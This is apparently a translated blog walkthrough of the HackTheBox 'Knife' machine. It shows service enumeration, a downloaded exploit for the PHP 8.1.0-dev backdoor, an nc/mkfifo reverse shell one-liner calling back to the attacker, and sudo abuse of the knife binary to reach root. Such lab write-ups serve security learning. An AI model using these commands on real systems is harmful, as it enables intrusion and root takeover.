[HTB] knife (php backdoor, sudo abuse: knife)

Keywords: penetration test


The host penetrated by this article is legally authorized. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purpose. I will not bear any responsibility for all the consequences, nor be responsible for any misuse or damage.

Service detection

└─# nmap -sV -Pn    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-27 23:34 EST
Nmap scan report for
Host is up (0.34s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.42 seconds

Catalog blasting

└─# python3 dirsearch.py -e* -t 100 -u

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/

Error Log: /root/dirsearch/logs/errors-21-11-27_23-34-49.log


[23:34:50] Starting:  
[23:36:09] 200 -    6KB - /index.php                                        
[23:36:09] 200 -    6KB - /index.php/login/                                 

There seems to be no particularly useful pages or directories

Source code review

I don't see anything useful

Software version enumeration

Port 80 is a website display page called EMA. After checking, EMA is emergency medical associates, emergency medical services. I don't see any obvious cms
The Apache version does not see any useful vulnerabilities
The ssh version does not see any useful vulnerabilities

Initial shell

View site information:

└─# whatweb -a 3                         [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]  

We see that the website uses PHP/8.1.0-dev version. We found that there is a backdoor in this development version in Google search. We use it This attack script Take the initial shell

Download the attack code locally and launch the attack:

└─# python3 499933.py                                                                     
Enter the full host url:

Interactive shell is opened on 
Can't acces tty; job crontol turned off.
$ id
uid=1000(james) gid=1000(james) groups=1000(james)

$ whoami

Get an initial shell

Get user.txt

$ find / -name user.txt

Right raising

View sudo privileges

$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

knife can be used without a password

We use the following command to raise permissions to root

sudo /usr/bin/knife exec -E 'exec "/bin/sh"'


$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
No input file specified.

After testing, we found that exp is not a complete shell, and many commands cannot be executed correctly

Check the current user's home directory and find that there are ssh login credentials

$ ls -alh /home/james/.ssh
total 16K
drwx------ 2 james james 4.0K May 18  2021 .
drwxr-xr-x 5 james james 4.0K May 18  2021 ..
-rw------- 1 james james 3.4K May  7  2021 id_rsa
-rw-r--r-- 1 james james  741 May  7  2021 id_rsa.pub

Add the public key to the target id_rsa.pub, download the private key to the local area, log in with ssh -i, find that the password still needs to be used, and check the ssh configuration / etc/ssh/sshd_config, it is found that the private key login setting is not enabled

Seems to have come to a dead end again..

Then enumerate the complete shell s to kali one by one and find that the following payload can run

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f

Get root.txt

└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [] from (UNKNOWN) [] 38954
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "__import__('pty').spawn('/bin/bash')"
james@knife:/$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'

sudo /usr/bin/knife exec -E 'exec "/bin/sh"'

# # id
uid=0(root) gid=0(root) groups=0(root)
# whoami
# cat /root/root.txt
cat /root/root.txt
{I'm kidding you~}

Posted by simon622 on Sun, 28 Nov 2021 11:04:39 -0800